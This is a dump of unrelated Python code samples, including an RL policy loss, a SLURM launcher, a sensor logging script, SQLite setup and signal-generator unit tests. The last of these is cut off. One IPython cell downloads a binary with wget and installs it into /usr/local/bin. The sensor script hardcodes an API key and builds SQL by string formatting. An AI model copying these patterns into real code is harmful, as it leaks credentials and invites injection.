actions_entropy=make_time_major(action_dist.multi_entropy(), drop_last=False),
message_entropy=make_time_major(action_dist.message_entropy(), drop_last=False),
dones=dones,
behaviour_action_logp=behaviour_action_logp,
behaviour_logits=make_time_major(unpacked_behaviour_logits, drop_last=False),
target_logits=make_time_major(unpacked_outputs, drop_last=False),
discount=policy.config["gamma"],
rewards=rewards,
values=make_time_major(values, drop_last=False),
bootstrap_value=bootstrap_value,
dist_class=dist_class,
model=model,
valid_mask=make_time_major(mask, drop_last=False),
config=policy.config,
vf_loss_coeff=policy.config["vf_loss_coeff"],
entropy_coeff=policy.entropy_coeff,
message_entropy_coeff=policy.config["model"]["custom_options"][
"message_entropy_coeff"
],
clip_rho_threshold=policy.config["vtrace_clip_rho_threshold"],
clip_pg_rho_threshold=policy.config["vtrace_clip_pg_rho_threshold"],
use_cpc=use_cpc,
**cpc_config,
use_sender_bias=use_sender_bias,
**sender_bias_config,
use_receiver_bias=use_receiver_bias,
**receiver_bias_config,
)
if hasattr(policy, "_pm_loss"):
return policy.loss.total_loss + policy._pm_loss
else:
return policy.loss.total_loss
def stats(policy, train_batch):
"""Stats to save during training"""
wasted_actions = tf.reduce_mean(train_batch[WASTED_ACTS])
core_stats = {
"cur_lr": tf.cast(policy.cur_lr, tf.float64),
"policy_loss": policy.loss.pi_loss,
"entropy": policy.loss.entropy,
"message_entropy": policy.loss.message_entropy,
"vf_loss": policy.loss.vf_loss,
"cpc_loss": policy.loss.cpc_loss,
"average_message_entropy": policy.loss.average_message_entropy,
"sender_bias_loss": policy.loss.sender_bias_loss,
"l_ce": policy.loss.l_ce,
"l_pl": policy.loss.l_pl,
"wasted_actions": wasted_actions,
}
if hasattr(policy.model, "_avg_message_p"):
core_stats["avg_message_p"] = policy.model._avg_message_p
if hasattr(policy, "_pm_loss"):
core_stats["pm_loss"] = policy._pm_loss
return core_stats
def build_apply_op(policy, optimizer, grads_and_vars):
"""
Override for custom gradient apply computation. Only change from the original policy
is setting the average message state in the case of inference based messaging.
"""
ops = [
optimizer.apply_gradients(
policy._grads_and_vars, global_step=tf.train.get_or_create_global_step()
)
]
if hasattr(policy, "_avg_message_state") and policy._avg_message_state is not None:
# Ops to update p(m) and optionally t for message probability scaling
ops.extend(policy.model.set_avg_message_state(policy._avg_message_state))
return ops
CommPolicy = CpcVTracePolicy.with_updates(
loss_fn=build_ma_comm_loss, stats_fn=stats, apply_gradients_fn=build_apply_op
)
SenderPolicy = CommPolicy.with_updates(name="Sender")
ReceiverPolicy = CommPolicy.with_updates(name="Receiver")
| StarcoderdataPython |
3324117 | <filename>binreconfiguration/itemgenerator/intuniform.py
"""Item generator: integer uniform distribution"""
from .itemgenerator import ItemGenerator
import random
class IntUniform(ItemGenerator):
def __init__(self, lower_bound, upper_bound):
self._lower_bound = lower_bound
self._upper_bound = upper_bound
def item(self):
"""Return a random integer.
"""
return random.randint(self._lower_bound, self._upper_bound)
| StarcoderdataPython |
1639463 | import os
from IPython.core.magic import register_line_magic
os.system('wget -qO tldr https://github.com/dbrgn/tealdeer/releases/download/v1.3.0/tldr-linux-x86_64-musl')
os.system('chmod +x tldr')
os.system('mv tldr /usr/local/bin')
os.system('tldr --update') # need once
@register_line_magic
def tldr(line):
get_ipython().system('tldr '+line)
| StarcoderdataPython |
3338189 | <reponame>wtriplett/lonestar4_launch<gh_stars>1-10
#!/usr/bin/env python
# launch script for stampede
# deals with both command files for parametric launcher and with single commands
import argparse
import sys,os
from tempfile import *
import subprocess
import math
MAXCORES=4104
MAXNODES=171
# set up argument args
def launch_slurm_ls5 (serialcmd='', script_name='', runtime='01:00:00',
jobname='launch', projname='', queue='normal', email=False, qsubfile='',
keepqsubfile=False, ignoreuser=False, test=False, parser=[], c=[], max_cores_per_node=None,
verbose=0, hold=[], outfile=[], cwd=[], nodes=0, use_hyperthreading=True):
if use_hyperthreading:
ncores_per_node = 48
else:
ncores_per_node = 24
if max_cores_per_node is None:
max_cores_per_node = ncores_per_node
elif int(max_cores_per_node) > ncores_per_node:
print("Requested max cores per node (%s) exceeds available cores per node (%d)." \
% (max_cores_per_node, ncores_per_node))
if use_hyperthreading is False:
print("Enabling hyperthreading (--ht) would double the available cores per node.")
sys.exit()
max_cores_per_node = int(max_cores_per_node)
if len(serialcmd) > 0:
print('sorry, serial mode is not currently supported')
sys.exit(1)
#parametric = 0
#print('Running serial command: '+cmd)
#nnodes = 1
#parenv = '1way'
#queue = 'serial'
elif script_name:
parametric = 1
print('Submitting parametric job file: ' + script_name)
try:
f = open(script_name,'r')
except:
print('%s does not exist -e!' % script_name)
sys.exit(0)
script_cmds = f.readlines()
f.close()
ncmds = len(script_cmds)
print('found %d commands' % ncmds)
# need to check for empty lines
for s in script_cmds:
if s.strip() == '':
print('command file contains empty lines - please remove them first')
sys.exit()
if not nodes:
nodes = math.ceil(float(ncmds)/float(max_cores_per_node))
print('Number of compute nodes not specified - estimating as %d' % nodes)
if int(nodes) > MAXNODES:
print('Warning # of nodes exceeds max allowed (%d), reducing requested nodes to %d.' \
% (nodes, MAXNODES))
nodes=MAXNODES
else:
print('ERROR: you must either specify a script name (using -s) or a command to run\n\n')
sys.exit()
if not qsubfile:
qsubfile,qsubfilepath = mkstemp(prefix=jobname+"_",dir='.',suffix='.slurm',text=True)
os.close(qsubfile)
total_cores = max_cores_per_node*int(nodes)
print('Outputting qsub commands to %s' % qsubfilepath)
qsubfile = open(qsubfilepath,'w')
qsubfile.write('#!/bin/bash\n#\n')
qsubfile.write('# SLURM control file automatically created by launch\n')
if parametric == 1:
qsubfile.write('#SBATCH -N %d\n'%int(nodes))
else:
print('sorry - serial mode is not currently supported')
sys.exit(1)
#qsubfile.write('# Launching single command: %s\n#\n#\n'%cmd)
qsubfile.write('#SBATCH -J %s # Job Name\n'%jobname)
qsubfile.write('#SBATCH -o {0}.o%j # Name of the output file (eg. myMPI.oJobID)\n'.format(jobname))
qsubfile.write('#SBATCH -p %s\n' % queue)
qsubfile.write('#SBATCH -t %s\n' % runtime)
qsubfile.write('#SBATCH -n %d\n' % total_cores) #ncmds)
if type(hold) is str:
qsubfile.write("#SBATCH -d afterok")
qsubfile.write(":{0}".format(int(hold)))
qsubfile.write('\n')
if projname != "":
qsubfile.write("#SBATCH -A {0}\n".format(projname))
try:
waitfor
except:
waitfor = None
if waitfor:
qsubfile.write('#SBATCH -d %d\n' % waitfor)
qsubfile.write('#----------------\n# Job Submission\n#----------------\n')
#qsubfile.write('umask 2\n\n')
if not parametric:
# currently not supported...
qsubfile.write('\n\nset -x # Echo commands, use "set echo" with csh\n')
qsubfile.write(cmd+'\n')
else:
#qsubfile.write('module load launcher\n')
qsubfile.write('export LAUNCHER_PLUGIN_DIR=$LAUNCHER_DIR/plugins\n')
qsubfile.write('export LAUNCHER_RMI=SLURM\n')
qsubfile.write('export LAUNCHER_JOB_FILE=%s\n'%script_name)
#qsubfile.write('cd $WORKDIR\n')
#qsubfile.write('echo " WORKING DIR: $WORKDIR/"\n')
qsubfile.write('$LAUNCHER_DIR/paramrun\n')
qsubfile.write('echo " "\necho " Parameteric Job Complete"\necho " "\n')
qsubfile.close()
jobid = None
if not test:
process = subprocess.Popen('sbatch %s' % qsubfilepath, shell=True, stdout=subprocess.PIPE)
for line in process.stdout:
print(line.strip())
if line.find('Submitted batch job') == 0:
jobid=int(line.strip().split(' ')[3])
process.wait()
if not keepqsubfile:
print('Deleting qsubfile: %s'%qsubfilepath)
os.remove(qsubfilepath)
return jobid
| StarcoderdataPython |
3345944 | from __future__ import print_function
import time
# import board
# import busio
# import adafruit_ads1x15.ads1015 as ADS
# from adafruit_ads1x15.analog_in import AnalogIn
# import Adafruit_DHT
import pyowm
import firebase_admin
from firebase_admin import credentials
from firebase_admin import db as fb_db
from datetime import datetime
import json
import requests
import MySQLdb
import mysql.connector
def main():
now = datetime.now()
# settings for temperature sensor (comment out if not the right sensor):
# local_sensor_type = Adafruit_DHT.DHT22
# pin = 12
# only adjust cred file with data for sensor
with open('/home/pi/placed/sensor_creds/local_db_cred_sensor2.json', 'r') as file:
connection_dictionary = json.load(file)
# load data from creds file
for line in connection_dictionary:
host = line['host']
user = line['user']
password = line['password']
sensor = line['sensor']
is_generic = line['is_generic']
# open connection to local SQL-Database
localDB = mysql.connector.connect(
host=host,
user=user,
password=password,
database="placed"
)
# cursor = element which reads/writes to/from database. Only onw is needed, for readability two
writeCursor = localDB.cursor()
readCursor = localDB.cursor()
# firebase-realitme-database initialization with special credits and uid-override
if not firebase_admin._apps:
cred = credentials.Certificate('/home/pi/placed_service_cred.json')
firebase_admin.initialize_app(cred, {
'databaseURL': 'https://placed-5b875-default-rtdb.europe-west1.firebasedatabase.app/',
'databaseAuthVariableOverride': {
'uid': 'sensor_placed_moist_1'
}
})
ref = fb_db.reference('/')
# connection to the Sensor. Uncomment right sensor type and adjust the connection parameters
# --- temperature and air-humidity sensor ---
# Adafruit_DHT.read_retry(local_sensor_type, pin)
# humidity, value = Adafruit_DHT.read_retry(local_sensor_type, pin)
# if humidity is not None and value is not None:
# print("Temp={0:0.1f}*C Humidity={1:0.1f}%"
# .format(value, humidity))
# else:
# print("Failed to get reading. Try again!")
# --- humidity-sensor ---
# i2c = busio.I2C(board.SCL, board.SDA)
# ads = ADS.ADS1015(i2c)
# chan = AnalogIn(ads, ADS.P0)
# value = 100 - (((float(chan.value) - 6000) / 12000) * 100)
# --- outdoor temperature from owm ---
request = requests.get(
'http://api.openweathermap.org/data/2.5/weather?q=Mainz&appid=1d8b79c5b6cfa1b5982dfb7f4db4bcfd&units=metric')
data = request.json()
for key in data['main']:
content = data['main'].get(key, '')
if key == "temp":
value = content
# --- outdoor weather type from owm ---
# r = requests.get(
# 'http://api.openweathermap.org/data/2.5/weather?q=Mainz&appid=1d8b79c5b6cfa1b5982dfb7f4db4bcfd&units=metric')
# json_content = json.loads(r.content)
# weather_id = json_content.get('weather').__getitem__(0).get('id')
print('value: ' + str(value))
# sql command for saving data to local server
sql = "INSERT INTO `data`(`sensor`, `is_generic`, `value`, `data_type`, `year`, `month`, `day`, `hour`, `minute`) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s')" % \
(sensor, is_generic, value, 'single', now.year, now.month, now.day, now.hour, now.minute)
# execution of sql command with fail-safe
try:
writeCursor.execute(sql)
localDB.commit()
print("data from sensor " + sensor + " inserted into " + host)
except Exception as e:
print("Error. Rolling back")
print(e)
# sql-command for getting the last entered id
sql = "SELECT id FROM data WHERE sensor = %s ORDER BY id DESC LIMIT 1"
inp = (sensor,)
readCursor.execute(sql, inp)
readResult = readCursor.fetchone()
# try to save the data to the firebase database with fail-safe
try:
data_ref = ref.child('data_by_sensors').child(sensor)
data_ref.update({
'id':readResult[0],
'sensor': int(sensor),
'is_generic': is_generic,
'value':value,
'data_type': 'single',
'year': now.year,
'month': now.month,
'day': now.day,
'hour': now.hour,
'minute': now.minute,
'requestUpdate': 0
})
print("data from sensor " + sensor + " uploaded to firebase")
except Exception as e:
print("Error. Rolling back")
print(e)
if __name__ == "__main__":
main() | StarcoderdataPython |
133563 | import sqlite3
from config.constants import DB_NAME
if __name__ == '__main__':
conn = sqlite3.connect(str(DB_NAME), detect_types=sqlite3.PARSE_DECLTYPES | sqlite3.PARSE_COLNAMES)
cursor = conn.cursor()
cursor.execute('''CREATE TABLE IF NOT EXISTS nodes
(node_number INTEGER PRIMARY KEY ,
node_name VARCHAR(100) NOT NULL );''')
cursor.execute('''CREATE TABLE IF NOT EXISTS temperature
(temperature_id INTEGER PRIMARY KEY,
temperature REAL NOT NULL,
time_stamp TIMESTAMP,
node_id INTEGER NOT NULL,
FOREIGN KEY (node_id) REFERENCES nodes(node_number));''')
conn.commit()
conn.close()
| StarcoderdataPython |
1653209 | <reponame>ECSLab/ES_IoT_Cloud
import urllib.parse
import urllib.request
import time
def postt(posturl, data):
req = urllib.request.Request(posturl, data)
return urllib.request.urlopen(req)
if __name__ == '__main__':
posturl = 'http://127.0.0.1:9000/upload'
dd = urllib.parse.urlencode({
'api_key': 'sdakasyri',
'device_id': '1',
'data': 'ON'}).encode('utf-8')
while(True):
postt(posturl, dd)
time.sleep(2)
| StarcoderdataPython |
30532 | <reponame>vanish125/DS1054_BodePlotter
"""Unit tests for fygen module."""
import unittest
import six
import fygen
import fygen_help
from wavedef import SUPPORTED_DEVICES
# pylint: disable=too-many-public-methods
# pylint: disable=invalid-name
# pylint: disable=too-many-lines
class FakeSerial(object):
"""Fake serial object for when more interaction is required."""
def __init__(self, read_lines):
self.read_lines = read_lines
self.write_lines = []
def getvalue(self):
return ''.join(self.write_lines)
def write(self, line):
self.write_lines.append(line.decode('utf8'))
# pylint: disable=unused-argument
# pylint: disable=no-self-use
def flush(self):
pass
def read(self, unused_length):
return '\n'
def reset_input_buffer(self):
pass
def reset_output_buffer(self):
pass
def read_until(self, terminator='\n', size=0):
"""fake read_until method."""
r = self.read_lines[0]
del self.read_lines[0]
return r
# pylint: enable=unused-argument
# pylint: enable=no-self-use
class TestFYGen(unittest.TestCase):
"""Test harness for FYGen."""
def setUp(self):
self.output = six.StringIO()
self.fy = fygen.FYGen(
port=self.output,
init_state=False,
device_name='fy2300',
)
def tearDown(self):
self.fy.close()
def test_help(self):
"""Asserts that all help sections render."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, fout=self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_device(self):
"""Tests calling help with a device name."""
for section in range(len(fygen_help.SECTIONS)):
fygen.help(section, 'fy2300', self.output)
self.assertIn('Other Help Sections', self.output.getvalue())
def test_help_invalid_section(self):
"""Provides an invalid help section number."""
with self.assertRaises(fygen.HelpError):
fygen.help(len(fygen_help.SECTIONS))
def test_get_version(self):
"""Tests the version command."""
self.assertEqual(1.0, fygen.get_version())
def test_autoset(self):
"""Tests autoset functionality."""
fy = fygen.FYGen(port=self.output)
fy.set((0, 1))
val = self.output.getvalue()
self.assertIn('WMN0\n', val)
self.assertIn('WFN0\n', val)
def test_autoset_with_args(self):
"""Tests autoset with additional arguments provided."""
fy = fygen.FYGen(port=self.output)
fy.set(wave='square', volts=0.1)
val = self.output.getvalue()
self.assertIn('WMW01\n', val)
self.assertIn('WMA0.10\n', val)
def test_send(self):
"""Tests the low-level send."""
fs = FakeSerial([b'foo\n', b'bar\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('foo', fy.send('foocmd'))
self.assertEqual('bar', fy.send('barcmd'))
self.assertEqual('foocmd\nbarcmd\n', fs.getvalue())
def test_send_too_short(self):
"""Provides a command that is too short."""
with self.assertRaises(fygen.CommandTooShortError):
self.fy.send('FO')
def test_set_enable(self):
"""Enables generator on both channels."""
self.fy.set(channel=(0, 1), volts=3, enable=True)
self.assertEqual(
'WMA3.00\n'
'WMN1\n'
'WFA3.00\n'
'WFN1\n',
self.output.getvalue())
def test_already_enabled(self):
"""Tests WMN1 is not sent if the channel is already enabled."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=True)
self.assertEqual('RMN\n', fs.getvalue())
def test_set_disable(self):
"""Tests disable function on both channels."""
fy = fygen.FYGen(port=self.output, default_channel=(0, 1), init_state=False)
fy.set(volts=3, enable=False)
self.assertEqual(
'WMN0\n'
'WMA3.00\n'
'WFN0\n'
'WFA3.00\n',
self.output.getvalue())
def test_already_disabled(self):
"""Tests that WMN0 is not sent if the channel is already disabled."""
fs = FakeSerial([b'0\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, enable=False)
self.assertEqual('RMN\n', fs.getvalue())
def test_invalid_channel(self):
"""Passes an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.set(channel=2)
def test_set_wave1(self):
"""Sets current wave by name."""
self.fy.set(wave='sin')
self.fy.set(channel=1, wave='square')
self.assertEqual(
'WMW00\n'
'WFW01\n',
self.output.getvalue())
def test_set_wave2(self):
"""Sets current wave by number."""
self.fy.set(wave=46)
self.assertEqual('WMW46\n', self.output.getvalue())
def test_wave_already_set(self):
"""Asserts a wave that is already square is not reset to square."""
fs = FakeSerial([b'1\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, wave='square')
self.assertEqual('RMW\n', fs.getvalue())
def test_unknown_wave(self):
"""Passes an unknown waveform name."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave='foo')
def test_invalid_wave_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set(wave=-1)
def test_set_freq1(self):
"""Sets a frequency using freq_hz."""
self.fy.set(freq_hz=5000)
self.fy.set(channel=1, freq_hz=1e6)
self.assertEqual(
'WMF00005000000000\n'
'WFF01000000000000\n',
self.output.getvalue())
def test_set_freq2(self):
"""Sets a frequency using freq_uhz."""
self.fy.set(freq_uhz=5000)
self.fy.set(channel=1, freq_uhz=1e6)
self.assertEqual(
'WMF00000000005000\n'
'WFF00000001000000\n',
self.output.getvalue())
def test_freq_already_set1(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'12345\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_hz=12345)
self.assertEqual('RMF\n', fs.getvalue())
def test_freq_already_set2(self):
"""Tests that a frequency is not reset to the same thing."""
fs = FakeSerial([b'1234.5\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, freq_uhz=1234500000)
self.assertEqual('RMF\n', fs.getvalue())
def test_set_both_frequencies(self):
"""Tries passing both freq_hz and freq_uhz."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=4000, freq_uhz=5000)
def test_invalid_freq1(self):
"""Tries passing a negative frequency (freq_hz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_hz=-1)
def test_invalid_freq2(self):
"""Tries passing a negative frequency (freq_uhz version)."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set(freq_uhz=-1)
def test_set_volts(self):
"""Sets voltage amplitude on both channels."""
self.fy.set(volts=10)
self.fy.set(channel=1, volts=0)
self.assertEqual(
'WMA10.00\n'
'WFA0.00\n',
self.output.getvalue())
def test_volts_already_set(self):
"""Tries to set the voltage to an already set value."""
fs = FakeSerial([b'56000\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, volts=5.6)
self.assertEqual('RMA\n', fs.getvalue())
def test_volts_too_low(self):
"""Tries to set the voltage to a negative value."""
fy = fygen.FYGen(port=self.output)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=-0.1)
def test_volts_too_high(self):
"""Tries to set the voltage higher than the allowed maximum."""
fy = fygen.FYGen(port=self.output, max_volts=1.5)
with self.assertRaises(fygen.InvalidVoltageError):
fy.set(volts=1.6)
def test_duty_cycle(self):
"""Sets the duty cycle on both channels."""
self.fy.set(duty_cycle=0.5)
self.fy.set(channel=1, duty_cycle=0.9)
self.assertEqual(
'WMD50.0\n'
'WFD90.0\n',
self.output.getvalue())
def test_duty_cycle_already_set(self):
"""Sets the duty cycle to an already-set value."""
fs = FakeSerial([b'10500\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, duty_cycle=0.105)
self.assertEqual('RMD\n', fs.getvalue())
def test_duty_cycle_too_low(self):
"""Tries to set the duty cycle to zero."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=0)
def test_duty_cycle_too_high(self):
"""Tries to set the duty cycle to one."""
with self.assertRaises(fygen.InvalidDutyCycleError):
self.fy.set(duty_cycle=1)
def test_offset_volts(self):
"""Sets the offset voltage on both channels."""
self.fy.set(offset_volts=1.5)
self.fy.set(channel=1, offset_volts=-1.6)
self.assertEqual(
'WMO1.50\n'
'WFO-1.60\n',
self.output.getvalue())
def test_offset_volts_already_set(self):
"""Tries to set the offset voltage to a value already set."""
fs = FakeSerial([b'12340\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, offset_volts=12.34)
self.assertEqual('RMO\n', fs.getvalue())
def test_offset_volts_too_low(self):
"""Tries to set the offset voltage too low."""
fy = fygen.FYGen(port=self.output, min_volts=-1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=-1.6)
def test_offset_volts_too_high(self):
"""Tries to set the offset voltage too high."""
fy = fygen.FYGen(port=self.output, max_volts=1.5, init_state=False)
with self.assertRaises(fygen.InvalidVoltageOffsetError):
fy.set(offset_volts=1.6)
def test_phase(self):
"""Sets the phase on both channels."""
self.fy.set(phase_degrees=10)
self.fy.set(channel=1, phase_degrees=380.3)
self.assertEqual(
'WMP10.000\n'
'WFP20.300\n',
self.output.getvalue())
def test_phase_already_set(self):
"""Tries to set the phase to an already-set value."""
fs = FakeSerial([b'189300\n'])
fy = fygen.FYGen(port=fs, init_state=False)
fy.is_serial = True
fy.read_before_write = True
fy.set(0, phase_degrees=189.3)
self.assertEqual('RMP\n', fs.getvalue())
def test_set_modulation(self):
"""Tries every known combination of modulatin and trigger."""
self.fy.set_modulation(mode=fygen.MODULATION_FSK)
self.fy.set_modulation(mode=fygen.MODULATION_ASK)
self.fy.set_modulation(mode=fygen.MODULATION_PSK)
self.fy.set_modulation(mode=fygen.MODULATION_BURST)
self.fy.set_modulation(mode=fygen.MODULATION_AM)
self.fy.set_modulation(mode=fygen.MODULATION_FM)
self.fy.set_modulation(mode=fygen.MODULATION_PM)
self.fy.set_modulation(trigger=fygen.TRIGGER_CH2)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_AC)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_IN)
self.fy.set_modulation(trigger=fygen.TRIGGER_MANUAL)
self.fy.set_modulation(trigger=fygen.TRIGGER_EXTERNAL_DC)
self.fy.set_modulation(burst_count=76)
self.fy.set_modulation(am_attenuation=0.121)
self.fy.set_modulation(pm_bias_degrees=23.4)
self.fy.set_modulation(hop_freq_hz=1234)
self.fy.set_modulation(hop_freq_uhz=1234)
self.fy.set_modulation(fm_bias_freq_hz=1234)
self.fy.set_modulation(fm_bias_freq_uhz=1234)
self.assertEqual(
'WPF0\n'
'WPF1\n'
'WPF2\n'
'WPF3\n'
'WPF4\n'
'WPF5\n'
'WPF6\n'
'WPM0\n'
'WPM1\n'
'WPM1\n'
'WPM2\n'
'WPM3\n'
'WPN76\n'
'WPR12.1\n'
'WPP23.4\n'
'WFK00001234000000\n'
'WFK00000000001234\n'
'WFM00001234000000\n'
'WFM00000000001234\n',
self.output.getvalue())
def test_invalid_modulation_mode(self):
"""Tries to set invalid modulation modes."""
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=-1)
with self.assertRaises(fygen.InvalidModulationModeError):
self.fy.set_modulation(mode=7)
def test_invalid_burst_cycle_count(self):
"""Tries to set an invalid burst cycle count."""
with self.assertRaises(fygen.InvalidBurstCycleCountError):
self.fy.set_modulation(burst_count=0)
def test_invalid_trigger_mode(self):
"""Tries to set invalid trigger modes."""
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=-1)
with self.assertRaises(fygen.InvalidTriggerModeError):
self.fy.set_modulation(trigger=4)
def test_invalid_am_attenuation(self):
"""Tries to set an invalid rate percentage."""
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=-0.1)
with self.assertRaises(fygen.InvalidAMAttenuationError):
self.fy.set_modulation(am_attenuation=2.1)
def test_invalid_hop_frequency(self):
"""Tries to set an invalid hop frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(hop_freq_hz=1, hop_freq_uhz=1)
def test_invalid_fm_bias_frequency(self):
"""Tries to set an invalid fm bias frequency."""
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_uhz=-0.1)
with self.assertRaises(fygen.InvalidFrequencyError):
self.fy.set_modulation(fm_bias_freq_hz=1, fm_bias_freq_uhz=1)
def test_get_enable(self):
"""Gets the current enable status."""
fs = FakeSerial([b'255\n', b'0\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(True, fy.get(0, 'enable'))
self.assertEqual(False, fy.get(1, 'enable'))
self.assertEqual('RMN\nRFN\n', fs.getvalue())
def test_get(self):
"""Calls get with no arguments."""
fs = FakeSerial([
b'50000\n', # duty cycle
b'255\n', # enable
b'12345.6789\n', # freq hz
b'12340\n', # offset volts
b'189300\n', # phase degrees
b'123400\n', # volts
b'4\n', # wave
])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual({
'duty_cycle': 0.5,
'enable': True,
'freq_hz': 12345,
'offset_volts': 12.34,
'phase_degrees': 189.3,
'volts': 12.34,
'wave': 'dc',
}, fy.get())
self.assertEqual(
'RMD\n'
'RMN\n'
'RMF\n'
'RMO\n'
'RMP\n'
'RMA\n'
'RMW\n'
'',
fs.getvalue())
def test_get_wave(self):
"""Gets the current wave."""
fs = FakeSerial([b'4\n', b'4\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual('dc', fy.get(0, 'wave'))
self.assertEqual({'wave': 'tri'}, fy.get(1, ('wave',)))
self.assertEqual('RMW\nRFW\n', fs.getvalue())
def test_get_invalid_channel(self):
"""Tries to pass an invalid channel."""
with self.assertRaises(fygen.InvalidChannelError):
self.fy.get(2, 'wave')
def test_get_invalid_parameter(self):
"""Tries to pass an invalid parameter."""
with self.assertRaises(fygen.UnknownParameterError):
self.fy.get(0, 'foo')
def test_get_invalid_waveform_index(self):
"""Unrecognized wave index is returned by the siggen."""
fs = FakeSerial([b'100\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.UnknownWaveformError):
fy.get(0, 'wave')
def test_get_freq1(self):
"""Gets the frequency in Hz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12345, fy.get(0, 'freq_hz'))
self.assertEqual('RMF\n', fs.getvalue())
def test_get_freq2(self):
"""Gets the frequency in uHz."""
fs = FakeSerial([b'12345.6789\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12345678900, fy.get(1, 'freq_uhz'))
self.assertEqual('RFF\n', fs.getvalue())
def test_get_volts(self):
"""Gets the amplitude voltage."""
fs = FakeSerial([b'123400\n', b'5000\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'volts'))
self.assertEqual(0.5, fy.get(1, 'volts'))
self.assertEqual('RMA\nRFA\n', fs.getvalue())
def test_get_offset_volts(self):
"""Gets the offset voltage."""
fs = FakeSerial([b'12340\n', b'4294962296\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(12.34, fy.get(0, 'offset_volts'))
self.assertEqual(-5, fy.get(1, 'offset_volts'))
self.assertEqual('RMO\nRFO\n', fs.getvalue())
def test_get_phase_degrees(self):
"""Gets the phase angle."""
fs = FakeSerial([b'0\n', b'189300\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0, fy.get(0, 'phase_degrees'))
self.assertEqual(189.3, fy.get(1, 'phase_degrees'))
self.assertEqual('RMP\nRFP\n', fs.getvalue())
def test_get_duty_cycle(self):
"""Gets the duty cycle."""
fs = FakeSerial([b'50000\n', b'10500\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
self.assertEqual(0.5, fy.get(0, 'duty_cycle'))
self.assertEqual(0.105, fy.get(1, 'duty_cycle'))
self.assertEqual('RMD\nRFD\n', fs.getvalue())
def test_set_waveform(self):
"""Sets a custom waveform."""
wave = [-1.0, 0.0, 1.0, 0.0] * 2048
self.fy.set_waveform(5, values=wave)
expected = 'DDS_WAVE5\n'
expected += '00000020FF3F002000000020FF3F0020\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_set_raw_waveform(self):
"""Sets a custom waveform using raw values."""
wave = [1, 2, 3, 4] * 2048
self.fy.set_waveform(6, raw_values=wave)
expected = 'DDS_WAVE6\n'
expected += '01000200030004000100020003000400\n' * 1024
self.assertEqual(expected, self.output.getvalue())
def test_bad_waveform_index(self):
"""Passes an invalid waveform index."""
with self.assertRaises(fygen.UnknownWaveformError):
self.fy.set_waveform(0, raw_values=[0]*8192)
def test_raw_value_conflict_error(self):
"""Passes both values and raw_values."""
with self.assertRaises(fygen.RawValueConflictError):
self.fy.set_waveform(1, values=[0.0] * 8192, raw_values=[0]*8192)
def test_value_count_error(self):
"""Passes the wrong array size."""
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, raw_values=[0]*8191)
with self.assertRaises(fygen.ValueCountError):
self.fy.set_waveform(1, values=[0.0]*8191)
def test_cmd_noack_error(self):
"""Simulates the siggen not responsing to the DDR_WAVE request."""
fs = FakeSerial([b'0\n', b'0\n', b'E\n'])
fy = fygen.FYGen(port=fs)
fy.is_serial = True
with self.assertRaises(fygen.CommandNotAcknowledgedError):
fy.set_waveform(1, values=[0.0]*8192)
def test_data_noack_error(self):
